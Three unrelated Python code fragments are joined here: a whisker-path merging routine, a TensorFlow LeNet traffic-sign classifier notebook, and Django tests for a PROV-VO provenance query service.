pdb.set_trace()
self.update( paths, a[0], ownership)
self.update( paths, b[0], ownership)
return ownership
def update( self, newpaths, owner, stubs ):
if 0:
from pylab import plot, cla, show
from .tests import plot_whiskers
cla()
plot(owner.x,owner.y,'k',linewidth=3)
plot_whiskers([e for e in p if e],marker='x')
show()
issame = lambda a,b: (a is not None) and (a==b) # true implies (b is not None)
br = stubs[owner]
if br:
didmerge = False
l,m,r = br # Filter paths to make sure only new paths
for p in newpaths:
if (not (l or r)) or issame(l,p[0]) or issame(r,p[-1]): # corresponding to `owner` are substituted
self._merge( owner, p )
didmerge = True
if not didmerge: # There was a break
self._merge( owner, None ) # But there was no parent path found that sourced the break...
def _merge( self, owner, newp ):
def substitute( op, a, np ):
def _iter():
for i,e in enumerate(op):
if e == a:
break
yield e
for e in np:
if e:
yield e
for e in op[i+1:]:
yield e
return tuple([e for e in _iter()])
olds = self._index.get(owner) # fetch paths to update.
if olds:
if newp:
news = set([ substitute( e, owner, newp ) for e in olds ]) # make new paths
self._paths.update(news) # add new paths
for e in newp:
self._index[e] = news # add mappings to new paths
return 1
else:
for p in olds: # remove old paths
self._paths.discard(p)
del self._index[owner] # remove mapping to old paths
return 0
@staticmethod
def _merge_middles( path ):
if len(path)==4:
l,m1,m2,r = path
lm1,rm1 = m1.split( old_div(len(m1),2) )
lm2,rm2 = m2.split( old_div(len(m2),2) )
m = Whisker_Seg.join( lm1,rm2 )
return (l,m,r)
else:
return path
@staticmethod
def compute_pairwise_conflict_paths( a, b, prune ):
"""
a and b are each tuples of (whisker, hitindex), as returned from CollisionTable.next()
Returns a set of tuples.
"""
bnda,bndb = trace_overlap(a,b)
la,ma,ra = breakout(a[0],bnda)
lb,mb,rb = breakout(b[0],bndb)
ownership = {a[0]:(la,ma,ra), b[0]:(lb,mb,rb)}
if not ma or not mb or prune(ma) or prune(mb):
ownership = {a[0]:None, b[0]:None}
pset = set()
return pset, ownership
pset = [ [ la, ma, ra ],
[ la, ma, mb, rb ],
[ lb, mb, ma, ra ],
[ lb, mb, rb ] ]
#prune
for p in pset:
for i,w in enumerate(p):
if w and prune(w):
p[i] = None
#transform to set of tuples
pset = set( [tuple(e) for e in pset] )
#0. Path's must have legititmate middle nodes.
for p in list(pset):
if len(p)==3 and p[1] is None:
pset.remove(p)
elif len(p)==4 and ( p[1] is None or p[2] is None ):
pset.remove(p)
#reduction
hasfullpath = False
# 1. Remove if can't get from left to right
for p in list(pset):
if p[0] is None and p[-1] is None:
pset.discard(p)
if p[0] is not None and p[-1] is not None:
hasfullpath = True
# 2. if only overlap, return composite of overlap
if len(pset)==0: #no endpoints - this happens for middle-only overlaps
m = max( (ma,mb), key = lambda w: w.scores.mean() )
ownership = {a[0]:(None,m,None), b[0]:(None,m,None)}
#ownership = {a[0]:None, b[0]:None}
pset = set( ((None,m,None),) ) #return best scoring
return pset, ownership
# 3. if there is at least one path from left to right, remove paths that
# don't
if hasfullpath:
for p in list(pset):
if p[0] is None or p[-1] is None:
pset.discard(p)
else:
# 4. if not, path's should not begin or end on merged middles
for p in list(pset):
if len(p)==4 and ( p[0] is None or p[-1] is None ):
| |
= np.append(X_train_p,zoomed,axis=0)
# y_train_p2 = np.append(y_train_p,y_train_p)
# X_train_p = np.append(X_train_p2,sheared_images_result,axis=0)
# y_train_p = np.append(y_train_p2,y_train_p)
#zoomed, rotated and shear
X_train_p2 = np.append(X_train_p,zoomed,axis=0)
y_train_p2 = np.append(y_train_p,y_train_p)
X_train_p2 = np.append(X_train_p2,result,axis=0)
y_train_p2 = np.append(y_train_p2,y_train_p)
X_train_p = np.append(X_train_p2,sheared_images_result,axis=0)
y_train_p = np.append(y_train_p2,y_train_p)
#final check data
# print(len(X_train_p))
# fig, axes = plt.subplots(2, 10, figsize = (15, 4.5))
# choice = np.random.choice(range(34799), 10)
# print(choice)
# for k in range(10):
# axes[0][k].set_axis_off()
# axes[0][k].imshow(X_train_p[choice[k,]]) #, interpolation = 'nearest', \
# #cmap = 'gray')
# axes[1][k].set_axis_off()
# axes[1][k].imshow(X_train_p[choice[k,]+34799]) #, interpolation = 'nearest', cmap = 'gray')
# ### Model Architecture
# In[24]:
### Define your architecture here.
### Feel free to use as many code cells as needed.
def LeNet(x):
# Arguments used for tf.truncated_normal, randomly defines variables for the weights and biases for each layer
mu = 0
sigma = 0.1
## TODO: Layer 1: Convolutional. Input = 32x32x1. Output = 28x28x6.
# Weight and bias
k_output = 6
weight = tf.Variable(tf.truncated_normal( [5, 5, COLOR_CHANNELS, k_output], mean = mu, stddev = sigma ))
bias = tf.Variable(tf.zeros(k_output))
network = tf.nn.conv2d(x, weight, strides=[1, 1, 1, 1], padding='VALID') # Apply Convolution
network = tf.nn.bias_add(network, bias) # Add bias
# TODO: Activation.
network = tf.nn.relu(network)
#network = tf.nn.dropout(network, 0.5)
# TODO: Pooling. Input = 28x28x6. Output = 14x14x6.
network = tf.nn.max_pool(network, ksize= [1,2,2,1], strides= [1,2,2,1], padding= 'VALID')
## TODO: Layer 2: Convolutional. Output = 10x10x16.
k_output = 16
weight = tf.Variable(tf.truncated_normal( [5, 5, 6, k_output], mean = mu, stddev = sigma ))
bias = tf.Variable(tf.zeros(k_output))
network = tf.nn.conv2d(network, weight, strides=[1, 1, 1, 1], padding='VALID') # Apply Convolution
network = tf.nn.bias_add(network, bias) # Add bias
# TODO: Activation.
network = tf.nn.relu(network)
#network = tf.nn.dropout(network, 0.5)
# TODO: Pooling. Input = 10x10x16. Output = 5x5x16.
network = tf.nn.max_pool(network, ksize= [1,2,2,1], strides= [1,2,2,1], padding= 'VALID')
# TODO: Flatten. Input = 5x5x16. Output = 400.
#network = flatten(network)
### TEST
## TODO: Layer 2.5: Convolutional. Output = 10x10x16.
k_output = 100
weight = tf.Variable(tf.truncated_normal( [2, 2, 16, k_output], mean = mu, stddev = sigma ))
bias = tf.Variable(tf.zeros(k_output))
network = tf.nn.conv2d(network, weight, strides=[1, 1, 1, 1], padding='VALID') # Apply Convolution
network = tf.nn.bias_add(network, bias) # Add bias
# TODO: Activation.
network = tf.nn.relu(network)
#network = tf.nn.dropout(network, 0.5)
# TODO: Pooling. Input = 4x4x100. Output = 2x2x100.
network = tf.nn.max_pool(network, ksize= [1,2,2,1], strides= [1,2,2,1], padding= 'VALID')
# TODO: Flatten. Input = 2x2x100. Output = 400.
network = flatten(network)
### END TEST
## TODO: Layer 3: Fully Connected. Input = 400. Output = 120.
k_output = 120
weight = tf.Variable(tf.truncated_normal(shape=(400, k_output), mean = mu, stddev = sigma))
bias = tf.Variable(tf.zeros(k_output))
network = tf.matmul(network, weight) + bias
# TODO: Activation.
network = tf.nn.relu(network)
network = tf.nn.dropout(network, 0.5)
## TODO: Layer 4: Fully Connected. Input = 120. Output = 84.
k_output = 84
weight = tf.Variable(tf.truncated_normal(shape=(120, k_output), mean = mu, stddev = sigma))
bias = tf.Variable(tf.zeros(k_output))
network = tf.matmul(network, weight) + bias
# TODO: Activation.
network = tf.nn.relu(network)
#network = tf.nn.dropout(network, 0.5)
## TODO: Layer 5: Fully Connected. Input = 84. Output = 10.
k_output = 43
weight = tf.Variable(tf.truncated_normal(shape=(84, k_output), mean = mu, stddev = sigma))
bias = tf.Variable(tf.zeros(k_output))
network = tf.matmul(network, weight) + bias
return network
# In[ ]:
#test
# print(type(X_train_p[0][0][0][0]))
# logits = LeNet(tf.constant(X_train_p[0], shape = (1, 32, 32, COLOR_CHANNELS)))
# print(logits)
# ### Train, Validate and Test the Model
# A validation set can be used to assess how well the model is performing. A low accuracy on the training and validation
# sets imply underfitting. A high accuracy on the training set but low accuracy on the validation set implies overfitting.
# In[27]:
### Train your model here.
### Calculate and report the accuracy on the training and validation set.
### Once a final model architecture is selected,
### the accuracy on the test set should be calculated and reported as well.
### Feel free to use as many code cells as needed.
#EPOCHS = 10
#BATCH_SIZE = 128
x = tf.placeholder(tf.float32, (None, 32, 32, COLOR_CHANNELS))
y = tf.placeholder(tf.int32, (None))
one_hot_y = tf.one_hot(y, 43)
#train pipeline
rate = 0.001
logits = LeNet(x)
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=one_hot_y, logits=logits)
loss_operation = tf.reduce_mean(cross_entropy)
optimizer = tf.train.AdamOptimizer(learning_rate = rate)
training_operation = optimizer.minimize(loss_operation)
#evalation
correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(one_hot_y, 1))
accuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
saver = tf.train.Saver()
def evaluate(X_data, y_data):
num_examples = len(X_data)
total_accuracy = 0
total_loss = 0
sess = tf.get_default_session()
for offset in range(0, num_examples, BATCH_SIZE):
batch_x, batch_y = X_data[offset:offset+BATCH_SIZE], y_data[offset:offset+BATCH_SIZE]
accuracy, loss = sess.run([accuracy_operation, loss_operation], feed_dict={x: batch_x, y: batch_y})
total_accuracy += (accuracy * len(batch_x))
total_loss += (loss * len(batch_x))
return total_accuracy / num_examples, total_loss / num_examples
# -----------------------------------------------------------------------
valid_acc = []
train_acc = []
valid_loss = []
train_loss = []
#run training
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
num_examples = len(X_train_p)
print("Training...")
print()
total_time = 0
for i in range(EPOCHS):
start = time.time()
X_train_p, y_train_p = shuffle(X_train_p, y_train_p)
for offset in range(0, num_examples, BATCH_SIZE):
end = offset + BATCH_SIZE
batch_x, batch_y = X_train_p[offset:end], y_train_p[offset:end]
sess.run(training_operation, feed_dict={x: batch_x, y: batch_y})
end = time.time()
epoch_time = end - start
total_time += epoch_time
train_accuracy, train_loss_val = evaluate(X_train_p, y_train_p)
validation_accuracy, validation_loss = evaluate(X_valid_p, y_valid)
#save for later analysis
train_acc.append(train_accuracy)
train_loss.append(train_loss_val)
valid_acc.append(validation_accuracy)
valid_loss.append(validation_loss)
# print("EPOCH {} ...".format(i+1))
# print("Validation Accuracy = {:.3f}".format(validation_accuracy))
print("EPOCH {} ...".format(i+1), " - Validation Accuracy = {:.3f}".format(validation_accuracy)," time: {:.4f}s".format(epoch_time))
print()
print("Total training time: : {:.4f}".format(total_time))
saver.save(sess, './lenet_signs')
print("Model saved")
# In[26]:
# plot accuracy and loss
#%matplotlib notebook
# get_ipython().run_line_magic('matplotlib', 'inline')
# import matplotlib.pyplot as plt
# epochs = range(1, len(train_acc) + 1)
# line_train, = plt.plot(epochs, train_loss, 'ro', label ='Training loss')
# line_valid, = plt.plot(epochs, valid_loss, 'b', label ='Validation loss')
# plt.title('Training and validation loss')
# plt.xlabel('Epochs')
# plt.ylabel('Loss')
# plt.legend(handles=[line_train, line_valid])
# plt.show()
# line_train, = plt.plot(epochs, train_acc, 'ro', label ='Training accuracy')
# line_valid, = plt.plot(epochs, valid_acc, 'b', label ='Validation accuracy')
# plt.title('Training and validation accuracy')
# plt.xlabel('Epochs')
# plt.ylabel('Accuracy')
# plt.legend(handles=[line_train, line_valid])
# plt.show()
# ---
#
# ## Step 3: Test a Model on New Images
#
# To give yourself more insight into how your model is working, download at least five pictures of German traffic signs from the web and use your model to predict the traffic sign type.
#
# You may find `signnames.csv` useful as it contains mappings from the class id (integer) to the actual sign name.
# ### Load and Output the Images
# In[ ]:
### Load the images and plot them here.
### Feel free to use as many code cells as needed.
# ### Predict the Sign Type for Each Image
# In[ ]:
### Run the predictions here and use the model to output the prediction for each image.
### Make sure to pre-process the images with the same pre-processing pipeline used earlier.
### Feel free to use as many code cells as needed.
# ### Analyze Performance
# In[ ]:
### Calculate the accuracy for these 5 new images.
### For example, if the model predicted 1 out of 5 signs correctly, it's 20% accurate on these new images.
# ### Output Top 5 Softmax Probabilities For Each Image Found on the Web
# For each of the new images, print out the model's softmax probabilities to show the **certainty** of the model's predictions (limit the output to the top 5 probabilities for each image). [`tf.nn.top_k`](https://www.tensorflow.org/versions/r0.12/api_docs/python/nn.html#top_k) could prove helpful here.
#
# The example below demonstrates how tf.nn.top_k can be used to find the top k predictions for each image.
#
# `tf.nn.top_k` will return the values and indices (class ids) of the top k predictions. So if k=3, for each sign, it'll return the 3 largest probabilities (out of a possible 43) and the correspoding class ids.
#
# Take this numpy array as an example. The values in the array represent predictions. The array contains softmax probabilities for five candidate images with six possible classes. `tf.nn.top_k` is used to choose the three classes with the highest probability:
#
# ```
# # (5, 6) array
# a = np.array([[ 0.24879643, 0.07032244, 0.12641572, 0.34763842, 0.07893497,
# 0.12789202],
# [ 0.28086119, 0.27569815, 0.08594638, 0.0178669 , 0.18063401,
# 0.15899337],
# [ 0.26076848, 0.23664738, 0.08020603, 0.07001922, 0.1134371 ,
# 0.23892179],
# [ 0.11943333, 0.29198961, 0.02605103, 0.26234032, 0.1351348 ,
# 0.16505091],
# [ 0.09561176, 0.34396535, 0.0643941 , 0.16240774, 0.24206137,
# 0.09155967]])
# ```
#
# Running it through `sess.run(tf.nn.top_k(tf.constant(a), k=3))` produces:
#
# ```
# TopKV2(values=array([[ 0.34763842, 0.24879643, 0.12789202],
# [ 0.28086119, 0.27569815, 0.18063401],
# [ 0.26076848, 0.23892179, 0.23664738],
# [ 0.29198961, 0.26234032, 0.16505091],
# [ 0.34396535, 0.24206137, 0.16240774]]), indices=array([[3, 0, | |
import datetime
import re
import json
from django.conf import settings
from django.core.urlresolvers import reverse
from django.utils import timezone
from django.test import TestCase
from django.test import Client
from django.test.utils import setup_test_environment
from prov_vo.models import Activity, ActivityFlow, HadStep
from prov_vo.models import Entity, Collection, WasGeneratedBy, Used, WasDerivedFrom, WasInformedBy, HadMember
from prov_vo.models import Agent, WasAssociatedWith, WasAttributedTo
from prov_vo.models import Parameter, ParameterDescription
from prov_vo.models import ActivityDescription, EntityDescription, UsedDescription, WasGeneratedByDescription
from prov_vo.forms import ProvDalForm
def get_content(response):
content = re.sub(r'document.*\n', '', response.content)
content = re.sub(r'endDocument', '', content)
content = re.sub(r'prefix.*\n', '', content)
# print 'content: \n', content
return content
# Model tests
class Activity_TestCase(TestCase):
def setUp(self):
f = Activity.objects.create(id="rave:myid", name="mylabel")
f.save()
def test_getActivity(self):
qset = Activity.objects.get(id="rave:myid")
self.assertEqual(qset.name, "mylabel")
class ActivityFlow_TestCase(TestCase):
def setUp(self):
af = ActivityFlow.objects.create(id="rave:flow", name="myflow")
af.save()
def test_getActivity(self):
qset = ActivityFlow.objects.get(id="rave:flow")
self.assertEqual(qset.name, "myflow")
class Entity_TestCase(TestCase):
def setUp(self):
e = Entity.objects.create(id="rave:dr4", name="RAVE DR4")
e.save()
def test_getEntity(self):
qset = Entity.objects.get(id="rave:dr4")
self.assertEqual(qset.name, "RAVE DR4")
class Agent_TestCase(TestCase):
def setUp(self):
a = Agent.objects.create(id="ex:ag1", name="<NAME>")
a.save()
def test_getAgent(self):
qset = Agent.objects.get(id="ex:ag1")
self.assertEqual(qset.name, "<NAME>")
class Used_TestCase(TestCase):
def setUp(self):
e = Entity.objects.create(id="rave:pipeline", name="RAVE Pipeline")
e.save()
a = Activity.objects.create(id="rave:act", name="myactivity")
a.save()
u = Used.objects.create(activity=a, entity=e)
u.save()
def test_getUsed(self):
qset = Used.objects.get(entity="rave:pipeline")
self.assertEqual(qset.entity.name, "RAVE Pipeline")
self.assertEqual(qset.activity.id, "rave:act")
class UsedDescription_TestCase(TestCase):
def setUp(self):
e = EntityDescription.objects.create(id="rave:pipeline", name="RAVE Pipeline")
e.save()
a = ActivityDescription.objects.create(id="rave:act", name="myactivity")
a.save()
u = UsedDescription.objects.create(activityDescription=a, entityDescription=e)
u.save()
def test_getUsedDescription(self):
qset = UsedDescription.objects.get(entityDescription="rave:pipeline")
self.assertEqual(qset.entityDescription.name, "RAVE Pipeline")
self.assertEqual(qset.activityDescription.id, "rave:act")
class WasGeneratedBy_TestCase(TestCase):
def setUp(self):
e = Entity.objects.create(id="rave:data", name="RAVE data")
e.save()
a = Activity.objects.create(id="rave:act", name="myactivity")
a.save()
wg = WasGeneratedBy.objects.create(activity=a, entity=e)
wg.save()
def test_getWasGeneratedBy(self):
qset = WasGeneratedBy.objects.get(entity="rave:data")
self.assertEqual(qset.entity.name, "RAVE data")
self.assertEqual(qset.activity.id, "rave:act")
class WasGeneratedByDescription_TestCase(TestCase):
def setUp(self):
e = EntityDescription.objects.create(id="rave:data", name="RAVE data")
e.save()
a = ActivityDescription.objects.create(id="rave:act", name="myactivity")
a.save()
wg = WasGeneratedByDescription.objects.create(activityDescription=a, entityDescription=e)
wg.save()
def test_getWasGeneratedByDescription(self):
qset = WasGeneratedByDescription.objects.get(entityDescription="rave:data")
self.assertEqual(qset.entityDescription.name, "RAVE data")
self.assertEqual(qset.activityDescription.id, "rave:act")
# View tests
# ==========
class ProvDAL_Accept_TestCase(TestCase):
def setUp(self):
a = Entity.objects.create(id="ex:ent", name="An example entity")
a.save()
def test_get_format_default(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent')
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
content.pop('prefix', None) # remove prefix
expected = {'entity': {'ex:ent': {'voprov:id': 'ex:ent', 'voprov:name': 'An example entity'}}}
self.assertEqual(content, expected)
def test_get_format_default2(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent', HTTP_ACCEPT="*/*")
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
content.pop('prefix', None) # remove prefix
expected = {'entity': {'ex:ent': {'voprov:id': 'ex:ent', 'voprov:name': 'An example entity'}}}
self.assertEqual(content, expected)
def test_get_format_provn1(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent&RESPONSEFORMAT=PROV-N', HTTP_ACCEPT="*/*")
self.assertEqual(response.status_code, 200)
def test_get_format_provn2(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent&RESPONSEFORMAT=PROV-N', HTTP_ACCEPT="text/*")
self.assertEqual(response.status_code, 200)
def test_get_format_provn3(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent&RESPONSEFORMAT=PROV-N', HTTP_ACCEPT="text/plain")
self.assertEqual(response.status_code, 200)
def test_get_format_provn_wrongaccept(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent&RESPONSEFORMAT=PROV-N', HTTP_ACCEPT="application/json")
self.assertEqual(response.status_code, 406)
def test_get_format_provjson1(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent&RESPONSEFORMAT=PROV-JSON', HTTP_ACCEPT="*/*")
self.assertEqual(response.status_code, 200)
def test_get_format_provjson2(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent&RESPONSEFORMAT=PROV-JSON', HTTP_ACCEPT="application/*")
self.assertEqual(response.status_code, 200)
def test_get_format_provjson3(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent&RESPONSEFORMAT=PROV-JSON', HTTP_ACCEPT="application/json")
self.assertEqual(response.status_code, 200)
def test_get_format_provjson_wrongaccept(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent&RESPONSEFORMAT=PROV-JSON', HTTP_ACCEPT="text/plain")
self.assertEqual(response.status_code, 406)
def test_get_format_provxml1(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent&RESPONSEFORMAT=PROV-XML', HTTP_ACCEPT="*/*")
self.assertEqual(response.status_code, 200)
def test_get_format_provxml22(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent&RESPONSEFORMAT=PROV-XML', HTTP_ACCEPT="application/*")
self.assertEqual(response.status_code, 200)
def test_get_format_provxml3(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent&RESPONSEFORMAT=PROV-XML', HTTP_ACCEPT="application/xml")
self.assertEqual(response.status_code, 200)
def test_get_format_unsupported(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent&RESPONSEFORMAT=HUBBA')
self.assertEqual(response.status_code, 415)
def test_get_format_unsupportedaccept(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=ex:ent', HTTP_ACCEPT="image/png")
self.assertEqual(response.status_code, 415)
class ProvDAL_General_TestCase(TestCase):
def setUp(self):
a = Activity.objects.create(id="rave:act", name="myactivity")
a.save()
af = ActivityFlow.objects.create(id="rave:flow", name="myflow")
af.save()
h = HadStep.objects.create(activityFlow=af, activity=a)
h.save()
e = Entity.objects.create(id="rave:dr4", name="RAVE DR4")
e.save()
e0 = Entity.objects.create(id="rave:obs", name="RAVE observations")
e0.save()
wg = WasGeneratedBy.objects.create(entity=e, activity=a)
wg.save()
u = Used.objects.create(activity=a, entity=e0)
u.save()
#wd = WasDerivedFrom.objects.create(generatedEntity=e, usedEntity=e0)
#wd.save()
ag = Agent.objects.create(id="org:rave", name="RAVE project")
ag.save()
was = WasAssociatedWith.objects.create(activity=a, agent=ag)
was.save()
wat = WasAttributedTo.objects.create(entity=e, agent=ag)
wat.save()
# ID is a required parameter
def test_getProvdalNoID(self):
client = Client()
response = client.get(reverse('prov_vo:provdal'))
self.assertEqual(response.status_code, 400)
self.assertEqual(response.content, 'Bad request: the ID parameter is required.')
def test_getProvdalNothingFound(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=blabla&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
found = re.findall(r"^act.*", response.content, flags=re.MULTILINE)
numlines = len(found)
self.assertEqual(numlines, 0)
def test_getProvdalPrefix(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=blabla&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
expected = \
"""document
prefix rave <http://www.rave-survey.org/prov/>
prefix prov <http://www.w3.org/ns/prov#>
prefix xsd <http://www.w3.org/2000/10/XMLSchema#>
prefix voprov <http://www.ivoa.net/documents/ProvenanceDM/ns/voprov/>
prefix custom <http://www.ivoa.net/documents/ProvenanceDM/ns/custom/>
endDocument"""
self.assertEqual(response.content, expected)
def test_get_caseinsensitive(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?id=rave:obs&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
content = get_content(response)
expected = \
"""entity(rave:obs, [voprov:name="RAVE observations"])
"""
self.assertEqual(content, expected)
def test_get_caseinsensitive_multi(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?id=rave:obs&ID=rave:dr4&RESPONSEFORMAT=PROV-N&DEPTH=0')
self.assertEqual(response.status_code, 200)
content = get_content(response)
expected = \
"""entity(rave:dr4, [voprov:name="RAVE DR4"])
entity(rave:obs, [voprov:name="RAVE observations"])
"""
self.assertEqual(content, expected)
def test_get_multisinglevalues(self):
client = Client()
for param in ['RESPONSEFORMAT', 'DEPTH', 'MODEL', 'MEMBERS', 'STEPS', 'AGENT', 'DIRECTION']:
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:dr4&%s=1&%s=2' % (param, param))
self.assertEqual(response.status_code, 400)
content = response.content
expected = "Bad request: parameter %s must occur only once or not at all." % (param)
self.assertEqual(content, expected)
def test_get_unsupportedparameter(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:dr4&SOMETHING=nothing')
self.assertEqual(response.status_code, 400)
content = response.content
expected = "Bad request: parameter SOMETHING is not supported by this service."
self.assertEqual(content, expected)
def test_get_unsupportedparameters(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:dr4&SOMETHING=nothing&ANYTHING=null')
self.assertEqual(response.status_code, 400)
content = response.content
expected = "Bad request: parameters ANYTHING, SOMETHING are not supported by this service."
self.assertEqual(content, expected)
def test_getProvdalActivityID(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:act&DEPTH=0&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
content = get_content(response)
expected = """activity(rave:act, -, -, [voprov:name="myactivity"])\n"""
self.assertEqual(expected, content)
def test_getProvdalEntityID(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:dr4&DEPTH=0&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
content = get_content(response)
expected = """entity(rave:dr4, [voprov:name="RAVE DR4"])\n"""
self.assertEqual(expected, content)
def test_getProvdalAgentID(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=org:rave&DEPTH=1&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
# only the agent itself should be returned
content = get_content(response)
expected = """agent(org:rave, [voprov:name="RAVE project"])\n"""
self.assertEqual(expected, content)
def test_getProvdalEntityIDMultiple(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:dr4&ID=rave:obs&DEPTH=0&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
content = get_content(response)
expected = """entity(rave:dr4, [voprov:name="RAVE DR4"])
entity(rave:obs, [voprov:name="RAVE observations"])
"""
self.assertEqual(expected, content)
def test_getProvdalMixedIDs(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:dr4&ID=rave:act&ID=org:rave&DEPTH=0&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
content = get_content(response)
expected = """\
activity(rave:act, -, -, [voprov:name="myactivity"])
entity(rave:dr4, [voprov:name="RAVE DR4"])
agent(org:rave, [voprov:name="RAVE project"])
"""
self.assertEqual(expected, content)
def test_getProvdalActivityFlow(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:flow&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
expected = 'activityFlow(rave:flow, -, -, [voprov:name="myflow"])'
found = re.search(r"^act.*", response.content, flags=re.MULTILINE)
self.assertEqual(found.group(0), expected)
def test_getProvdalActivityFlowW3C(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:flow&RESPONSEFORMAT=PROV-N&MODEL=W3C')
self.assertEqual(response.status_code, 200)
expected = 'activity(rave:flow, -, -, [prov:label="myflow", voprov:votype="voprov:activityFlow"])'
found = re.search(r"^act.*", response.content, flags=re.MULTILINE)
self.assertEqual(found.group(0), expected)
def test_getProvdalActivityFlowDepth2(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:flow&DEPTH=2&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
found = re.findall(r"^act.*", response.content, flags=re.MULTILINE)
self.assertEqual(len(found), 1)
def test_getProvdalActivityFlowIncludeSteps(self):
# If STEPS=TRUE, substeps of the activityFlow shall be followed,
# thus both, activityFlow and activity must be returned
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:flow&DEPTH=3&STEPS=true&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
found = re.findall(r"^act.*", response.content, flags=re.MULTILINE)
self.assertEqual(len(found), 2)
def test_getProvdalActivityFlowIncludeStepsW3C(self):
# If STEPS=TRUE, substeps of the activityFlow shall be followed,
# thus both, activityFlow and activity must be returned
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:flow&DEPTH=3&STEPS=true&RESPONSEFORMAT=PROV-N&MODEL=W3C')
#print 'content: ', response.content
self.assertEqual(response.status_code, 200)
found = re.findall(r"^act.*", response.content, flags=re.MULTILINE)
self.assertEqual(len(found), 2)
found2 = re.findall(r"^wasInfluencedBy.*", response.content, flags=re.MULTILINE)
self.assertEqual(len(found2), 1)
def test_getProvdalActivityDepth2(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:act&DEPTH=2&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
found = re.findall(r"^act.*", response.content, flags=re.MULTILINE)
self.assertEqual(len(found), 2)
def test_getProvdalHadStepW3C(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:act&DEPTH=1&RESPONSEFORMAT=PROV-XML&MODEL=W3C')
self.assertEqual(response.status_code, 200)
expected = \
"""<prov:document xmlns:custom="http://www.ivoa.net/documents/ProvenanceDM/ns/custom/" xmlns:prov="http://www.w3.org/ns/prov#" xmlns:rave="http://www.rave-survey.org/prov/" xmlns:voprov="http://www.ivoa.net/documents/ProvenanceDM/ns/voprov/" xmlns:xsd="http://www.w3.org/2000/10/XMLSchema#">
<prov:activity prov:id="rave:act">
<prov:label>myactivity</prov:label>
</prov:activity>
<prov:activity prov:id="rave:flow">
<prov:label>myflow</prov:label>
<voprov:votype>voprov:activityFlow</voprov:votype>
</prov:activity>
<prov:entity prov:id="rave:obs">
<prov:label>RAVE observations</prov:label>
</prov:entity>
<prov:agent prov:id="org:rave">
<prov:label>RAVE project</prov:label>
</prov:agent>
<prov:used>
<prov:activity prov:ref="rave:act"/>
<prov:entity prov:ref="rave:obs"/>
</prov:used>
<prov:wasAssociatedWith>
<prov:activity prov:ref="rave:act"/>
<prov:agent prov:ref="org:rave"/>
</prov:wasAssociatedWith>
<prov:wasInfluencedBy>
<prov:influencee prov:ref="rave:flow"/>
<prov:influencer prov:ref="rave:act"/>
<voprov:votype>voprov:hadStep</voprov:votype>
</prov:wasInfluencedBy>
</prov:document>
"""
self.assertEqual(expected, response.content)
# In this implementation, ID can also take an agent's ID, but agent relations are only
# followed beyond the agent if AGENT option is set to TRUE
def test_getProvdalAgentFollow(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=org:rave&AGENT=TRUE&DEPTH=1&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
# agent, activity, entity, wat and was. relation should be returned
# strip begin/end document and prefix from response content:
content = get_content(response)
expected = \
"""activity(rave:act, -, -, [voprov:name="myactivity"])
